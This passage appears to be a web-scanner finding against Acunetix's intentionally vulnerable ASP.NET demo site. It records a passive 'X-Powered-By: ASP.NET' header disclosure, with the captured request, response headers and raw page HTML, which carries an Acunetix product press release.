BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
Method	GET
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 350 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 22904
Response Body - size: 22,904 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLWjL6iDQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBAoC8+YwLqXVDFYA1YYr1Hu6oI9o" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 